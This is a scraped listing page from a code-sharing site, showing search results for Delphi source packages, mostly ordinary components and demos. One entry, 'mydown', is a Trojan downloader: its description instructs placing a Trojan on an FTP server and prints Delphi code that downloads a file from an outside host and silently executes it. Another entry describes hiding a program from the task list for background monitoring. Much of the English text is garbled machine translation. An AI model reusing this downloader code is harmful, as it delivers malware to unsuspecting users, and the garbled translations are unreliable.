Welcome![Sign In][Sign Up]
Location:
Search - delphi r

Search list

[Other resourceCocoSourcesCS

Description: The Compiler Generator Coco/R Coco/R1 is a compiler generator, which takes an attributed grammar of a source language and generates a scanner and a parser for this language. The scanner works as a deterministic finite automaton. The parser uses recursive descent. LL(1) conflicts can be resolved by a multi-symbol lookahead or by semantic checks. Thus the class of accepted grammars is LL(k) for an arbitrary k. There are versions of Coco/R for Java, C#, C++, Delphi, Modula-2, Oberon and other languages. This manual describes the versions for C# and Java implemented at the
Platform: | Size: 42373 | Author: yy | Hits:

[File OperateFileStorage.v3.0.1

Description: he FileStorage component capable to upload and hold any data files within your Delphi/BCB forms (within the body of the EXE-program). If your software requires any additional files (.DLL s, WAV s, .TXT s etc), these files could be uploaded straight onto your form and be extracted from executable file at run-time (AutoExtract property). Also you can access to stored files directly from memory without extracting them to disk (see example). You can use this component if you would like to make high integration of your app with stored files and get access to them at run-time or, if you would like to supply your customers with just one, single executable file!.-he FileStorage component capable to Uploader d and hold any data files within your Delphi / BCB forms (within the body of the EXE-program). If y our software requires any additional files (. D LL s, s WAV and. TXT s etc), these files could be uploaded onto you straight r form and be extracted from executable file at r un-time (AutoExtract property). Also you can a ccess to stored files directly from memory with extracting them out to disk (see example). You c an use this component if you would like to make hi gh integration of your app with stored files and get access to them at run-time or, if you would like to supply your customers with j su one, single executable file! .
Platform: | Size: 118596 | Author: hfb | Hits:

[WinSock-NDISmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1436 | Author: 韩冰 | Hits:

[WinSock-NDISBTDemo

Description: delphi实现的bt下载器示例程序,带全部源码和BT协议 包中文件说明: BTDemo.dpr, BTDemoF.pas, BTDemoF.dfm -- 一个简单的bt下载器,支持多个.torrent文件同时下载 btutils.pas -- 核心bt组件 DCP*.pas -- SHA算法源码(复制自DEC组件包) InetUtils.pas -- 提供Internet下载的函数库 SimpleSocks.pas -- socket组件(TCP) SortLists.pas -- 排序的List组件 ThreadTimer.pas -- 定时器与线程池 DelayLists.pas -- 一个延时5秒再释放Object的队列 FastShareMem.pas, MemPools.pas, ShareGlobals.inc -- 由ThreadTimer内部使用 Bit Torrent Specification.htm -- BT协议文档-realized bt download procedures for example, with all source code and BT agreement package documents : BTDemo.dpr, BTDemoF.pas. BTDemoF.dfm -- a simple bt downloader, supports multiple. torrent download documents btutils.pas -- the core components bt DCP *. pas -- SHA algorithm source code (copied from the DEC kits) InetUtils.pas -- providing Internet download library SimpleSocks.pas -- socket Group pieces (TCP) SortLists.pas -- Ranking List components ThreadTime r.pas -- and the timer thread pool DelayLists.pas -- a delay the release of another five seconds O return of the queue FastShareMem.pas, MemPools.pas. ShareGlobals.inc -- ThreadTimer internal use by Tor Bit rent Specification.htm -- BT agreement document
Platform: | Size: 58245 | Author: vvyang | Hits:

[Button controldl99_EhLib36_D6-7

Description: for delphi7 .1已经发布,完全支持BDS4.0,这个是评估版的。 希望大家能够找到正式版本..... 另外,4.0的正式版下载文件名为:hq8205_Ehlib_v4.0_FS.rar 14 January 2006 Deployed EhLib 4.1 + Added support of Borland Developer Studio 2006 (Delphi and C++ Builder). * Fixed a error of the grid twinkling in the tree mode on opening a node. * Fixed a error of filling a list of values in the filter when PickList and KeyList properties for the TColumnEh is filled. * Some other bugfixes.-for delphi7 .1 has been issued and fully support the BDS4.0, this is a version of the assessment. Hope you can find the official version ..... addition, the 4.0 version download file is named : hq8205_Ehlib_v4.0_FS.rar 14 January 2006 Dep loyed EhLib 4.1 Added support of Borland Develo per Studio 2006 (Delphi and C Builder). * Fixed a error of the grid in the tree twinkling on op mode ening a node. * Fixed a error of filling a list of v R in the filter and when PickList KeyList pr operties for the TColumnEh is filled. * Some oth er bugfixes.
Platform: | Size: 2295371 | Author: peterwang | Hits:

[Delphi VCLphp4Delphi

Description: delphi下对PHP进行二次开发的接口控件,版本6.2 PHP4Delphi is a Delphi interface to PHP for Delphi 5, 6, 7, Delphi 2005 and Delphi 2006,支持PHP至5.1.2-delphi right under the Second PHP Development Interface Controls Version 6.2 PHP4Delphi Delphi is a PHP interface to az r Delphi 5, 6, 7, Delphi 2005 and Delphi 2006, to support PHP 5.1.2
Platform: | Size: 730918 | Author: CJH | Hits:

[Special Effectsyueguang

Description: 分而治之方法还可以用于实现另一种完全不同的排序方法,这种排序法称为快速排序(quick sort)。在这种方法中, n 个元素被分成三段(组):左段l e f t,右段r i g h t和中段m i d d l e。中段仅包含一个元素。左段中各元素都小于等于中段元素,右段中各元素都大于等于中段元素。因此l e f t和r i g h t中的元素可以独立排序,并且不必对l e f t和r i g h t的排序结果进行合并。m i d d l e中的元素被称为支点( p i v o t )。图1 4 - 9中给出了快速排序的伪代码,,Delphi 赫夫曼编码.rar.rar - 用delhi做的程序实现了哈夫曼编码,做的还不错。,,Delphi -divide and rule method can be used to achieve an entirely different sort of way This sorting called Quick Sort (quick sort). In this approach, n elements is divided into three (group) : Left of the l e f t, Right of g h i r t and middle m i d e d l. Middle contains only one element. Left of the elements are less than equal to the middle element of the right elements are larger than the middle element. So l and f t e r t h i g of elemental independent sort, and no need to l and f t e r t h i g ranking results merger. M i d e d l The element known as Fulcrum (p i v o t). Figure 1 4-9 is given a quick sort of pseudo-code. Delphi Hefuman coding. rar.rar - delhi do with the realization of Huffman coding. doing quite well. ,, Delphi
Platform: | Size: 2489430 | Author: 罗成芝 | Hits:

[Othercomplexcalculate

Description: 该计算器是弥补Windows系统“科学型计算器Microsoft((R)_R5.1”功能的不足。专门用来进行两个复数的加、减、乘、除与取反(共轭)计算。用delphi 7 编写。 双击应用程序:Calculate.exe 即打开复数计算器窗口。 -Calculator is the Windows system to make up for "science-based Microsoft Calculator ((R) _R5.1 "functional deficiencies. two devoted to the increase in the plural, subtraction, multiplication, Except for the anti - (conjugate) basis. prepared with delphi 7. Double-click application : Calculate.exe that is the plural Calculator window open.
Platform: | Size: 357209 | Author: zyx | Hits:

[Other resourcexuejiguanlics

Description: delphi和sql结合,学生学籍管理系统,附详细文档,有e-r图,适用课程设计-delphi and sql combination of the Student Management System, with detailed documentation, e-r map applicable curriculum design
Platform: | Size: 568088 | Author: jiaquan | Hits:

[Other resourceAnother_eYes_BTDemo

Description: 由delphi实现的bt下载器示例程序,带全部源码和BT协议 包中文件说明: BTDemo.dpr, BTDemoF.pas, BTDemoF.dfm -- 一个简单的bt下载器,支持多个.torrent文件同时下载 btutils.pas -- 核心bt组件 DCP*.pas -- SHA算法源码(复制自DEC组件包) InetUtils.pas -- 提供Internet下载的函数库 SimpleSocks.pas -- socket组件(TCP) SortLists.pas -- 排序的List组件 ThreadTimer.pas -- 定时器与线程池 DelayLists.pas -- 一个延时5秒再释放Object的队列 FastShareMem.pas, MemPools.pas, ShareGlobals.inc -- 由ThreadTimer内部使用 Bit Torrent Specification.htm -- BT协议文档-achieved by delphi bt download procedures for example, with all source code and BT agreement package documents : BTDemo.dpr, BTDemoF.pas. BTDemoF.dfm -- a simple device bt download, support a number. torrent download documents btutils.pas -- bt core components of DCP *. pas -- SHA algorithm source code (copy from the DEC kits) InetUtils.pas -- provide Internet download library SimpleSocks.pas -- socket Group pieces (TCP) SortLists.pas -- Ranking List components ThreadTime r.pas -- and the timer thread pool DelayLists.pas -- a delay the release of another five seconds O bject cohort FastShareMem.pas, MemPools.pas. ShareGlobals.inc -- from the internal use of Bit ThreadTimer Tor 366 Specification.htm -- BT agreement document
Platform: | Size: 98249 | Author: 李顺 | Hits:

[Delphi VCLvc++2delphi

Description: 利用Delphi的代码在VC中显示JPG图片,不使用动态连接库。 Mail_Report.zip   一个邮件报告程序。 SrcFirstProg.zip   解释了最基本的MFC程序流程。 tabcontrol_demo.zip tabcontrol_src.zip   自定义的标签控件对话框。 Undo_demo.zip undo_src.zip    在VC中实现Undo和Redo功能。 -using Delphi code in VC show JPG picture, the non-use of Dynamic Link Library. Mail_Report.zip a mail reporting procedures. SrcFirstProg.zip explanation of the most basic MFC program flow. Since tabcontrol_demo.zip tabcontrol_src.zip definition of the label dialog controls. Undo_demo.zip undo_src.zip in VC achieve Undo and R edo function.
Platform: | Size: 143353 | Author: 康健 | Hits:

[Other resource60179234620073232119409141894

Description: 《Delphi 7数据库应用技术与实例》源代码__客户端数据集更新实例.ra《Delphi 7数据库应用技术与实例》源代码__客户端数据集更新实例.ra-"Delphi 7 database technology and application examples of the" source code __ client data update examples. R a "Delphi 7 database technology and application examples of the" source code __ client data update examples. ra
Platform: | Size: 10583 | Author: 赵君 | Hits:

[Other resource6017923462007323211742854968

Description: 《Delphi面向对象编程实例教程》源代码____数据表的基本操作.rar《Delphi面向对象编程实例教程》源代码____数据表的基本操作.rar-"Delphi object-oriented programming examples Guide" source code ___ data table basic operation. Ra r "Delphi object-oriented programming examples Guide" source code ___ data table basic operation. rar
Platform: | Size: 343031 | Author: 赵君 | Hits:

[Delphi VCLFastReport3.23

Description: 报表控件。FastReport 是非常强大的报表控件,相比QuickReport,ReportBuilder更加灵活,又非常小巧,速度快。VCL版本支持Borland Delphi 2-6 and Borland C++Builder 1-6。CLX版本支持Delphi和Kylix-statements control. FastReport is a very powerful statements controls, as compared with QuickReport. ReportBuilder more flexible, and very compact, fast. VCL version supports Borland Delphi and Borland C 2-6 Builde r 1-6. CLX versions support Delphi and Kylix
Platform: | Size: 6029489 | Author: chen | Hits:

[Other resourceLightweightCTI

Description: LightweightCTI是一套旨在帮助开发人员迅速构建语音相关应用的一套开放源代码的基础框架,目前你下载和使用的是构建于Pwin2000+ + Delphi/C++Builder环境下的框架,所有的基础性代码使用Pascal语言完成。LightweightCTI的最终目标不是成为一套可在多种语音卡基础上使用的IVR软件(尽管目前其仅仅支持东进模拟卡的大部分功能),而是希望其成为语音应用开发的基础性框架,为此它当然需要有跨开发语言、跨语音板卡的能力。当然在写本文是我还只是做了一点点的基础性工作而矣,也希望通过它来促成LightweightCTI本身的发展,使其真正成为大家在开发语音应用时可用、能用的框架。通过本次重构其本身的架构已经基本定了下来,而且本人也居于它开发完成了公司的语音催缴与查询系统,所以其完全可应用于一般的应用开发中。同时,为了便于大家对LightweightCTI进行扩展,在接下来的时间我会为其写一套可插拨的插件容器,只要符合其接口规定的组件都可以成为LightweightCTI的一部分。-LightweightCTI is a set designed to help developers quickly build voice related applications Open source set the basic framework, Currently you download and use the building in Pwin2000 + Delphi / C Builder environment The framework, all the basic code using Pascal language completed. LightweightCTI the ultimate goal is not to become a voice in a variety of cards based on the use of IV R software (although its only support the East simulation into the most functional card), but his voice has become the basis for application development framework, for which it will need to cross-language development, - Voice Card capabilities. Of course, at this writing I have only done a little bit of infrastructure work and starts, It also hopes to push LightweightCTI own development. it really has become
Platform: | Size: 628957 | Author: LightweightCTI | Hits:

[Delphi VCLr

Description: Delphi:Delphi利用语句删除SQL数据,需要有SQL数据库,源代码仅供学习参考,SQL请自备,根据代码可还原数据库。 -Delphi: Delphi use SQL statement to delete data, you need to have SQL database, source code for study and reference, SQL please bring your own, according to the code can restore the database.
Platform: | Size: 182272 | Author: RNJQ2GK | Hits:

[Delphi VCLr

Description: Delphi:Delphi在程序中控制扫描仪扫描图片,测试扫描仪的程序,还可进行扫描仪设置。 -Delphi: Delphi in the program controls the scanner to scan pictures, test the scanner program, but also for the scanner settings.
Platform: | Size: 197632 | Author: 3BZDQ3P | Hits:

[Compress-Decompress algrithmslz4-delphi-master

Description: Delphi bindings for [lz4](https://code.google.com/p/lz4/). Includes easy-to-use wrapper class and an default mode implementation of the new [lz4s streaming format](http://fastcompression.blogspot.fr/2013/04/lz4-streaming-format-final.html). A Binding for xxHash is also present, since it is necessary for lz4s Lz4 Version [r119](https://code.google.com/p/lz4/source/detail?r=119)
Platform: | Size: 49152 | Author: taazz | Hits:

[Mathimatics-Numerical algorithmsDelphi-back-monitor

Description: 一、把当前进程变为一个系统服务:   目的是在任务列表中把程序隐藏起来。调用API函数RegisterServiceProcess实现。   二、定义全局热键(本例中定义热键Ctrl+Del+R),步骤:   1、定义捕获Windows消息WM_HOTKEY的钩子函数,即:procedure WMHotKey(var Msg : TWMHotKey) message WM_HOTKEY   2、向Windows加入一个全局原子 Myhotkey: GlobalAddAtom(’MyHotkey’), 并保留其句柄。   3、向Windows登记热键:调用API函数RegisterHotKey实现。-failed to translate
Platform: | Size: 1024 | Author: zhan30840 | Hits:

[Delphi VCLDragAndDrop-maste_(Win-a-macOS)r

Description: DELPHI Firemonkey 实现在WINDOWS和MAC平台下拖拽控件-DELPHI Firemonkey to achieve drag and drop controls in WINDOWS and MAC platform
Platform: | Size: 407552 | Author: 子诚 | Hits:
« 1 2 3 4 5 6 78 9 10 »

CodeBus www.codebus.net